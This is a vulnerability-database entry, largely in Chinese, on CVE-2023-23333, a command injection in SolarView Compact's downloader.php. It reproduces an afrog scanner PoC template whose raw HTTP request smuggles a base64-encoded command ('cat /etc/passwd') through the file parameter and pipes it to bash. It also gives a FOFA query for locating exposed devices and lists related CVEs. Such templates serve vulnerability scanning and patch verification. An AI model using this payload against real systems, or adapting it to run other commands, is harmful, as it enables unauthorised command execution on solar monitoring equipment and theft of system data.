CVE-2023-23333: SolarView downloader.php rce

日期: 2025-09-01 | 影响软件: SolarView | POC: 已公开

漏洞描述

There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php. FOFA: SolarView Compact

PoC代码[已公开]

id: CVE-2023-23333

info:
  name: SolarView downloader.php rce
  author: zan8in,zhizho
  severity: critical
  verified: true
  description: |
    There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.
    FOFA: SolarView Compact
  reference:
    - https://github.com/Timorlover/CVE-2023-23333
    - https://mp.weixin.qq.com/s/2aaL3Bh1gzYGTqKQXNh46A
  tags: cve,cve2023,rce,solarview
  created: 2023/06/15

set:
  hostname: request.url.host
rules:
  r0:
    request:
      raw: |
        GET /downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg==%7Cbase64%20-d%7Cbash%00.zip HTTP/1.1
        Host: {{hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2023/CVE-2023-23333.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2022-29303: SolarView Compact conf_mail.php 远程命令执行漏洞 POC

CVE-2022-40881: SolarView network_test.php 远程命令执行漏洞 POC

CVE-2023-29919: SolarView Compact <= 6.00 - Local File Inclusion POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637） 无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358） 无POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637）无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358）无POC